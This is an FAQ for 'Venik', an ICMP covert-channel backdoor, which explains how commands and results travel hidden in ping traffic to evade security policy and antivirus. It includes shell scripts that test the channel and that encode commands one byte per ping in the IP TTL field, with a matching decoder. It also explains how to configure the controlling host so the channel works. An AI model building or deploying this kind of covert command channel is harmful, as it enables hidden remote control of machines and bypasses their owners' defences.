
Venik – Frequently Asked Questions


Q1 What does “Venik” stand for?
A1 Venik stands for “VEnik is Not another Icmp bacKdoor”.
Venik is also the last word of Softwar, the novel by Thierry Breton and Denis Beneich: “Maman m’a dit de te dire un grand secret: c’est VENIK” (“Mom told me to tell you a big secret: it’s VENIK”).

Q2 What is Venik’s official home page?
A2 Venik’s official home page is http://www.tourdot.fr/venik.

Q3 Where can I download Venik?
A3 You can download Venik from the official home page.

Q4 Is Venik open-source software?
A4 Yes, Venik is open-source software.

Q5 Under which license is Venik distributed?
A5 Venik is distributed under the GNU General Public License version 3 (GPLv3). This means you can copy, redistribute, modify, aggregate or translate it under the terms of the GPL.

Q6 Where can I get the Venik source code?
A6 You can download the Venik source code from the official home page.

Q7 In which programming language is Venik developed?
A7 Venik is composed of a client (Venik Client) and a server (Venik Server).
Venik Client is a simple script file (Bourne shell for Linux, batch for Windows).
The part of Venik Server I developed is written entirely in Java but uses external libraries. All of these external libraries (see APPENDIX B – Venik Server third parties) are open source and written in Java, except the JPCAP library, which is written in C. So Venik Server cannot be considered a pure Java program because of this small piece of C code.

Q8 What is a covert channel?
A8 « In Computer Security, a covert channel is a type of computer security attack that creates a capability to transfer information objects between processes that are not supposed to be allowed to communicate by the computer security policy » (Source: Wikipedia, 2010-07-01).

Q9 Why is Venik a covert channel backdoor?
A9 Venik is a covert channel backdoor because it lets the server and clients transfer information objects (commands, command results, …) inside legitimate flows (ICMP_ECHO_REQUEST and ICMP_ECHO_REPLY) that are not supposed to transport this kind of information. Ping traffic is usually permitted by the security policy, so the command channel hides inside flows that are already allowed.

Q10 Is Venik a virus?
A10 Absolutely not. Venik is not a virus. Venik Client is a simple script that only uses legitimate, basic tools provided by the target operating system (the ping command, see Q20).

Q11 Is Venik recognized as a virus by anti-virus software?
A11 No, since Venik is not a virus (see the question above, Is Venik a virus?).

Q12 Why must the server host’s operating system not reply to incoming ICMP_ECHO_REQUEST messages?
A12 Venik Server and Venik Client use ICMP messages to communicate. Venik Client sends ICMP_ECHO_REQUEST messages and Venik Server replies with ICMP_ECHO_REPLY messages.
Usually, when a computer replies to ICMP_ECHO_REQUEST messages, the processing is performed by a dedicated component of the operating system: the operating system’s ICMP processor (its IP stack).
Let us consider the two following cases (case 1 and case 2).

Case 1: Server host’s operating system replies to incoming ICMP_ECHO_REQUEST messages:
Step 1: Venik Client sends an ICMP_ECHO_REQUEST message to Venik Server
Step 2: Both the server host’s operating system AND Venik Server receive the ICMP_ECHO_REQUEST message
Step 3: Both the server host’s operating system AND Venik Server process the ICMP_ECHO_REQUEST message
Step 4: Both the server host’s operating system AND Venik Server reply to Venik Client with an ICMP_ECHO_REPLY message
Step 5: Venik Client receives two ICMP_ECHO_REPLY messages, one from the server host’s operating system and one from Venik Server. With two replies per request, Venik Client can no longer tell which ICMP_ECHO_REPLY carries Venik Server’s data, so the channel does not work.
Case 2: Server host’s operating system does not reply to incoming ICMP_ECHO_REQUEST messages:
Step 1: Venik Client sends an ICMP_ECHO_REQUEST message to Venik Server
Step 2: Both the server host’s operating system AND Venik Server receive the ICMP_ECHO_REQUEST message (Venik Server captures it at the network interface, below the IP stack, so a firewall rule that drops the request in the IP stack does not hide it from Venik Server)
Step 3: The server host’s operating system does not process the incoming ICMP_ECHO_REQUEST message because it is configured not to reply to ICMP_ECHO_REQUEST messages
Step 4: Venik Server processes the ICMP_ECHO_REQUEST message and replies to Venik Client with an ICMP_ECHO_REPLY message
Step 5: Venik Client receives only one ICMP_ECHO_REPLY message (from Venik Server)

Figure: Case 1: Server host’s operating system replies to incoming ICMP_ECHO_REQUEST messages

Figure: Case 2: Server host’s operating system does not reply to incoming ICMP_ECHO_REQUEST messages

Q13 How do I configure the server host’s operating system not to reply to incoming ICMP_ECHO_REQUEST messages?
A13 See APPENDIX C – How to manually configure the firewall?

Q15 How can I check that the server host’s operating system does not reply to incoming ICMP_ECHO_REQUEST messages?
A15 You can use the Venik Client -t option (-t means test) to check whether the server host’s operating system blocks incoming ICMP_ECHO_REQUEST messages while still letting outgoing ICMP_ECHO_REPLY messages through.

For example, supposing the server host’s IP address is x.x.x.x, run the following command from the Venik client:

On Linux:

>cd
>venik.sh -t x.x.x.x

On Windows:

Venik Client is currently not implemented for Windows. It will be in next release.

Notes:
You can use the server host’s name (hostname) in the above commands instead of its IP address x.x.x.x.

To understand how the Venik Client -t option works, see the question below, What is the Venik Client “-t” option?

Q16 What is the Venik Client “-t” option?
A16 The Venik Client -t option lets you test (-t means test) whether Venik Client and Venik Server are able to communicate with each other.
To check this, Venik Client uses a two-step protocol.

Step 1 First, Venik Client sends an ICMP_ECHO_REQUEST message to the server host and waits for an ICMP_ECHO_REPLY message. In other words, Venik Client checks whether the client host is able to ping the server host. If Venik Client gets no ICMP_ECHO_REPLY message, it stops, because Venik Client and Venik Server are not able to communicate.
Step 2 Then, Venik Client sends an ICMP_ECHO_REQUEST message with a specific length to the server host. Venik Server is configured not to reply to ICMP_ECHO_REQUEST messages of this specific length. So if Venik Client receives an ICMP_ECHO_REPLY message, it must have been sent by the server host’s operating system, and Venik Client stops, because Venik Client and Venik Server will not be able to communicate (see Q12, Why must the server host’s operating system not reply to incoming ICMP_ECHO_REQUEST messages?). If Venik Client receives no ICMP_ECHO_REPLY message, the reply to the step 1 request must have come from Venik Server, so Venik Client and Venik Server are able to communicate. Note that step 2 relies on the absence of a reply: a lost packet, or an intermediate firewall dropping the larger request, looks exactly like success.
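As an added example (not Venik’s own venik.sh, which this page does not reproduce), here is the two-step -t check written as a POSIX shell script on top of the system ping command, the same tool the real client relies on. The marker length VENIK_MARKER_LEN (1111 bytes), the exit codes and the iputils ping flags are assumptions; the real client’s values are not documented on this page.

```shell
#!/bin/sh
# Hypothetical re-implementation of the Venik Client "-t" check (added example, not venik.sh).
# Assumption: the server ignores ICMP_ECHO_REQUEST messages whose payload is VENIK_MARKER_LEN
# bytes long; the real marker length is not documented on this page.
VENIK_MARKER_LEN=${VENIK_MARKER_LEN:-1111}
NORMAL_LEN=56   # default ping payload size of iputils ping

# Send one ICMP_ECHO_REQUEST with payload length $2 to host $1.
# Returns 0 if an ICMP_ECHO_REPLY came back within 2 seconds, non-zero otherwise.
# (-s sets the payload length, -W the reply timeout in seconds: iputils ping flags.)
send_probe() {
    host=$1
    size=$2
    ping -c 1 -W 2 -s "$size" "$host" >/dev/null 2>&1
}

# The two-step test. Return codes: 0 = Venik Server answered and the OS is silent,
# 1 = no reply at all (step 1 failed), 2 = the OS ICMP processor answered (step 2 failed).
venik_test() {
    host=$1

    # Step 1: the client host must be able to ping the server host at all.
    if ! send_probe "$host" "$NORMAL_LEN"; then
        echo "step 1: no ICMP_ECHO_REPLY from $host: Venik Client cannot reach Venik Server"
        return 1
    fi

    # Step 2: a marker-length request that Venik Server deliberately ignores.
    # Any reply here can only come from the host operating system (case 1 of Q12).
    if send_probe "$host" "$VENIK_MARKER_LEN"; then
        echo "step 2: $host answered the marker-length request: the OS ICMP processor replies, Venik Server would compete with it"
        return 2
    fi

    # No reply in step 2 (caveat: a lost packet looks the same) means step 1 was answered by Venik Server.
    echo "ok: $host is silent on ICMP_ECHO_REQUEST, the step-1 reply came from Venik Server"
    return 0
}

# Usage: sh venik-test.sh <server host>
if [ $# -gt 0 ]; then
    venik_test "$1"
fi
```

Because ping is wrapped in send_probe, the decision logic can be exercised without a network by redefining that one function, which is how the three outcomes (unreachable, OS answers, only Venik Server answers) are checked.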

Q17 Why does Venik Server support x86 and not x86-64 architectures?
A17 Venik Server uses JPCAP, an external library, to manipulate ICMP packets. The main part of JPCAP is written in Java (jpcap.jar); the other part is native, in other words written in C. The native part of JPCAP has been built only for x86 architectures. I will build it for both x86 and x86-64 architectures in the next release of Venik.

Q18 Why is the controlling host called “server” and the controlled host called “client”?
A18 Unlike classical network protocols such as SSH or Telnet, where the server runs on the controlled host and the client on the controlling host, Venik Server runs on the controlling host and Venik Client on the controlled host. This can be a little confusing, but it makes sense: with Venik, connections are initiated by the controlled hosts, which is why the controlled hosts are called clients and the controlling hosts servers.

Q19 What is the only flow required between Venik Client and Venik Server?
A19 The only flow required between attacker and target is ICMP, more precisely ICMP_ECHO_REQUEST from target to attacker and ICMP_ECHO_REPLY from attacker to target. In other words, « the target only has to be able to ping the attacker to be controlled ».

Q20 How do Venik Client and Venik Server communicate?
A20 Venik Client uses the ping command provided by the target operating system to send ICMP_ECHO_REQUEST messages to Venik Server, and Venik Server replies to Venik Client with ICMP_ECHO_REPLY messages. Communication between target and attacker through these ICMP messages uses two header fields: the ICMP LENGTH and the TTL (Time To Live) of the IP packet carrying the message. More precisely, target identification is performed using the LENGTH field of the ICMP_ECHO_REQUEST, whereas data (commands, command results, …) are transported in the TTL field of the ICMP_ECHO_REQUEST and ICMP_ECHO_REPLY messages. Since TTL is an 8-bit field, each message carries at most one byte of data, and the value observed at the receiver is the value sent minus one per router crossed.
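The TTL field holds one byte, so the natural encoding is one character per ICMP message. The following added example (not Venik’s own wire format, which this page does not document) shows what the client side of such a channel looks like on top of ping, and the decoding the server side has to perform on the TTLs it captures. The per-client length CLIENT_LEN, the hop count HOPS and the use of ping’s -t flag for the TTL (iputils ping; BSD and macOS ping use -m) are assumptions.

```shell
#!/bin/sh
# Added illustration of "data in TTL, client identity in LENGTH" (not Venik's own encoding).
# Assumptions: CLIENT_LEN is the payload length that identifies this client to the server,
# HOPS is the number of routers between client and server (each one decrements the TTL).
CLIENT_LEN=${CLIENT_LEN:-64}
HOPS=${HOPS:-0}

# Client side: print one ping invocation per byte of the command $1, addressed to host $2.
# -s sets the ICMP payload length, -t the IP TTL (iputils ping; BSD/macOS ping uses -m for TTL).
# Printable ASCII (32-126) stays above zero after a few decrements; a byte of 0 could not be
# sent this way, since a TTL of 0 is not a valid outgoing value.
encode_cmd() {
    cmd=$1
    host=$2
    printf '%s' "$cmd" | od -An -tu1 -v | tr -s ' \n' '\n' | sed '/^$/d' |
    while read -r byte; do
        echo "ping -c 1 -s $CLIENT_LEN -t $byte $host"
    done
}

# Server side: rebuild the command from the TTLs observed in captured ICMP_ECHO_REQUEST
# messages of length CLIENT_LEN, one TTL per line on stdin, adding the hop decrements back.
decode_ttls() {
    while read -r ttl; do
        byte=$((ttl + HOPS))
        # printf "\ooo" turns the octal byte value back into the character
        printf "\\$(printf '%03o' "$byte")"
    done
    echo
}

# Usage: sh venik-ttl.sh "<command>" <server host>
if [ $# -eq 2 ]; then
    encode_cmd "$1" "$2"
fi
```

Selecting captured requests by length (here CLIENT_LEN) is what lets the server ignore ordinary pings and tell clients apart; decoding needs the path length, which is why a real implementation must learn or fix HOPS rather than read the TTL raw.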

Q21 Where can I find help about Venik?
A21 Does this mean you did not find answers to your questions in this user guide? If that is really the case, you can send me your question by e-mail at yann@tourdot.fr.

Q22 Why do I need administrator privileges to run Venik Server?
A22 Venik Server requires administrator privileges to capture the ICMP_ECHO_REQUEST messages sent by clients and to send ICMP_ECHO_REPLY messages to clients (packet capture and raw packet injection are privileged operations; on Linux the CAP_NET_RAW capability is what is actually required). Moreover, you also need administrator privileges if you want Venik Server to activate and configure your firewall automatically in order to force the server host’s operating system not to reply to ICMP_ECHO_REQUEST messages (see Q12, Why must the server host’s operating system not reply to incoming ICMP_ECHO_REQUEST messages?).

Q23 Why is it recommended to run Venik Server on Windows XP / Vista / Seven / 2008 Server or on Linux with iptables?
A23 Windows XP / Vista / Seven / 2008 Server have an embedded firewall. Venik can automatically activate and configure the Windows embedded firewall in order to force the server host’s operating system not to reply to ICMP_ECHO_REQUEST messages (see Q12, Why must the server host’s operating system not reply to incoming ICMP_ECHO_REQUEST messages?).
If you are running Venik Server on Linux and the iptables firewall is installed, Venik can likewise automatically activate and configure iptables in order to force the server host’s operating system not to reply to ICMP_ECHO_REQUEST messages (see Q12, Why must the server host’s operating system not reply to incoming ICMP_ECHO_REQUEST messages?).